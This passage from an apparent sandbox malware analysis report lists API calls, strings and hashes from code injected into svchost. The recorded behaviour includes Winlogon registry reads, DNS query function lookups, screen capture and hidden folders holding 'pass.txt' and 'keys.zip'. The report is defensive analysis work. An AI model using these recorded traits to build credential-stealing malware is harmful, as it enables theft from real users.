                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2935687291-0
                                                                                                                                                                                                                • Opcode ID: 2e4fd2d02f021029f217e39c1d414f68985e1159ca62b275ebed3bf504d10df9
                                                                                                                                                                                                                • Instruction ID: 7176f689e37a5023560fb6d1ad6659e2af967092e3b527c04adef249582d5183
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e4fd2d02f021029f217e39c1d414f68985e1159ca62b275ebed3bf504d10df9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59319A71A462106BDBA19F61F98CB6B7B9CEF45766F548515ED08DB340CB70CC90CAB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 02D44B60
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D44B79
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D44B7C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D44B90
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 02D44BB0
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D44BC0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BD1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D44BD4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BE1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D44BE4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Shell, xrefs: 02D44BAA
                                                                                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 02D44B45
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocCloseFreeOpenQueryValidateValuememset
                                                                                                                                                                                                                • String ID: Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon
                                                                                                                                                                                                                • API String ID: 2162099866-2454539505
                                                                                                                                                                                                                • Opcode ID: b0ddad1992f7528aea9cf4791a8e572147d696c7b554d13b54c495cc121e5da7
                                                                                                                                                                                                                • Instruction ID: cce0189e9e8a116377b195425a434b052e5809ae2d7eb88eaf32e86273e03ec2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0ddad1992f7528aea9cf4791a8e572147d696c7b554d13b54c495cc121e5da7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA21A175E812147BEB209AA4AC4DFAFBBACEB44B55F100545F908E7340DAB19D9086E0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D26070
                                                                                                                                                                                                                • DnsFlushResolverCache.DNSAPI ref: 02D2607A
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75B07390), ref: 02D2608A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02D260A3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02D260BF
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02D260DB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02D260F7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                                • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                                • API String ID: 2466897691-3547598143
                                                                                                                                                                                                                • Opcode ID: 2e1d65df4df408259518bb1ca7d0842137d9b0d537f76930e9514d07f7f0dff0
                                                                                                                                                                                                                • Instruction ID: 3a9edd419d99d3725e30f616e10728e1dba83055580459d46e24e4633c74489b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e1d65df4df408259518bb1ca7d0842137d9b0d537f76930e9514d07f7f0dff0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96014F32B8132632B92136B27E0EF6B270D5F64E48BA40110F903B1345DE9CEC8D88B9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D2D858
                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D869
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: GetComputerNameA.KERNEL32(02D6F588,?), ref: 02D2D7B7
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: lstrlenA.KERNEL32(02D6F588,?,?,?,02D3714F), ref: 02D2D7C2
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D802
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D812
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D822
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D82F
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D83C
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02D6F5A0), ref: 02D2D893
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8AC
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: SetThreadDesktop.USER32(?,74DEF590,74DE16B0,00000000), ref: 02D28D3F
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: GetDC.USER32(00000000), ref: 02D28D47
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02D28D58
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: GetDeviceCaps.GDI32(00000000,00000008), ref: 02D28D69
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02D28D80
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02D28DC2
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02D28DD2
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: DeleteObject.GDI32(00000000), ref: 02D28DD5
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: ReleaseDC.USER32(00000000,00000000), ref: 02D28DDE
                                                                                                                                                                                                                  • Part of subcall function 02D28D30: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D28E39
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D6F54C), ref: 02D2D8D9
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8EC
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,02D6F670,?,?,02D27F92,00000000,00000000), ref: 02D2D90A
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D91B
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,02D6F630,?,?,02D27F92,00000000,00000000), ref: 02D2D92F
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D948
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D95B
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D96E
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,02D6F5DC,?,?,02D27F92,00000000,00000000), ref: 02D2D984
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2940656088-0
                                                                                                                                                                                                                • Opcode ID: 3846ea25153a711f94934a99c540495bee00549762989f1ea578e28196a22e56
                                                                                                                                                                                                                • Instruction ID: c9c7aa44b599956466c7b1176f9db4f70037568202d99190649bb06ccfea8e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3846ea25153a711f94934a99c540495bee00549762989f1ea578e28196a22e56
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47311871BC83227AF7205F69AC0AF552B996714B14F244816F705FA3C0EBE0AC148E68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1,?,75BFBF00), ref: 02D40A10
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,75BFBF00), ref: 02D40A51
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,75BFBF00), ref: 02D40A5B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D40A63
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D40A74
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,75BFBF00), ref: 02D40A7B
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,75BFBF00), ref: 02D40A88
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1,?,?,?,75BFBF00), ref: 02D40AF7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 5E8DC3C1$keys.zip$path1.txt
                                                                                                                                                                                                                • API String ID: 1373881290-3976757129
                                                                                                                                                                                                                • Opcode ID: ff827ced13e28ad59f9f9762fd5f0a4b548c68c99be5730b1e974a8f864940c6
                                                                                                                                                                                                                • Instruction ID: a75023bc085c02853d5a799870944f20ff0edf10b31c048d2cc70a2df6268de6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff827ced13e28ad59f9f9762fd5f0a4b548c68c99be5730b1e974a8f864940c6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF4116716046555FCB25CB34A868AE77BE4EF95301F148595DACAC7300EF71DD84CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A40
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A7D
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D43A92
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D43A9C
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D43AA4
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43AB5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D43ABC
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D43B90,00000000,00000000,00000000), ref: 02D43B25
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D43B3D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D43B4E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashCreateErrorHandleLast$AdminCloseDirectoryFolderInformationMakeSystemThreadUser
                                                                                                                                                                                                                • String ID: pass.txt
                                                                                                                                                                                                                • API String ID: 3876079015-1961669250
                                                                                                                                                                                                                • Opcode ID: 83aedc28b06de81be35d4c47587df1d1df104de39a41f94ac032c12bfbb81a89
                                                                                                                                                                                                                • Instruction ID: af9812f7b849a2774b2bc10d67cf896b361420b31bc11bd8956dba0c0cb9b0be
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83aedc28b06de81be35d4c47587df1d1df104de39a41f94ac032c12bfbb81a89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48410131A482559BDB20DF68E858BEA7BA9EF09304F2444D4ECC697340DF70DD98CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A40
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A7D
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D43A92
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D43A9C
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D43AA4
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43AB5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D43ABC
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D43B90,00000000,00000000,00000000), ref: 02D43B25
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D43B3D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D43B4E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashCreateErrorHandleLast$AdminCloseDirectoryFolderInformationMakeSystemThreadUser
                                                                                                                                                                                                                • String ID: pass.txt
                                                                                                                                                                                                                • API String ID: 3876079015-1961669250
                                                                                                                                                                                                                • Opcode ID: 29d6508a6258cbc3071a8eaba09a0ef0d68a4e3cd639a385daf7943b684c915c
                                                                                                                                                                                                                • Instruction ID: e9d665087977ba4c9a46b5fccfb8145d1278e3297d3b4323c1cfb5b601b03bac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d6508a6258cbc3071a8eaba09a0ef0d68a4e3cd639a385daf7943b684c915c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7410031A442559BDB20DF68E858BEA7BA9EF49304F2484C4EC86D7340DF70DD98CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26A81
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26A9F
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D26ABB
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104), ref: 02D26AE2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02D26B5A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D26B61
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26B75
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02D26B8E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D26B9C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: A1633BD9a$software\microsoft
                                                                                                                                                                                                                • API String ID: 217510255-1581879137
                                                                                                                                                                                                                • Opcode ID: 0da08ca20a8b89c130d7454ea7b61035c1784b79d7e75350bf467c9d9a07e8db
                                                                                                                                                                                                                • Instruction ID: 8099477aa10b2384a37f51e8f7d52aa03864a54077b9ec8bb0146c1d198320ae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0da08ca20a8b89c130d7454ea7b61035c1784b79d7e75350bf467c9d9a07e8db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F31D571D412286AEB25DB649C4DFEE7B6CEF18708F000499E509E2241D7B4CE88CBE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26921
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2693F
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02D2695A
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(80000001,A1633BD9a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02D26981
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02D269FA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02D26A01
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26A15
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02D26A2E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02D26A3C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: A1633BD9a$software\microsoft
                                                                                                                                                                                                                • API String ID: 217510255-1581879137
                                                                                                                                                                                                                • Opcode ID: ad4aa954e845d7de822cee9dfce66a34a70f8d47829392cddc8dcd5297b09b51
                                                                                                                                                                                                                • Instruction ID: 2199c11016dbe96afc3bbdc40abfda2891da2b0845cd9d080720724f81e74b90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad4aa954e845d7de822cee9dfce66a34a70f8d47829392cddc8dcd5297b09b51
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C931A571D4122866DB25DB649C4DBEE7B6CEF18B08F404499E549E6240D7B4CE88CBE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D418CD
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D418D7
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D418DF
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D418F0
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D418F7
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D41904
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D41AE0,00000000,00000000,00000000), ref: 02D4194A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D41962
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41973
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakePathSystemThreadUser
                                                                                                                                                                                                                • String ID: 5E8DC3D7$pass.txt
                                                                                                                                                                                                                • API String ID: 1033491162-1244847135
                                                                                                                                                                                                                • Opcode ID: cf1bba6caecc68467a6cd8cbdf2e50e47534c4e502dc3d56739922157214d357
                                                                                                                                                                                                                • Instruction ID: 5fdc03794af89acf5972de7f03774dd2a12cedd704f9a1b98bdc3964cadb7da7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf1bba6caecc68467a6cd8cbdf2e50e47534c4e502dc3d56739922157214d357
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7631C531A40215ABDB218B64A81C7EB7BA8EF45341F548694E88997340EFB0DDD8CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D23951
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D368DD), ref: 02D23964
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D23970
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D2399D
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D368DD), ref: 02D239AA
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D239B6
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D239E9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick$_snprintf
                                                                                                                                                                                                                • String ID: %x%x$3eaeb407628e78f$RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 3150073801-4107548479
                                                                                                                                                                                                                • Opcode ID: 7bfdd6ea130dd7d0752e73ad24c98e78e7c8e97a788127f6fdfbb96cbc46ae34
                                                                                                                                                                                                                • Instruction ID: 5a14658e86638344b8a2ced82f8d04c3c0041d2914e6f8f1cfb963b98a25b670
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bfdd6ea130dd7d0752e73ad24c98e78e7c8e97a788127f6fdfbb96cbc46ae34
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01C831FC02116FFB049A79BC4DDB6335AAB9A7143448D25EA12E2380EBA8CD25C670
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02D3EA9C
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3EAB2
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02D3EAC0
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3EAC9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3EAE1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3EAF3
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc1e5), ref: 02D3EAFE
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc1e5,CRAIF), ref: 02D3EB18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
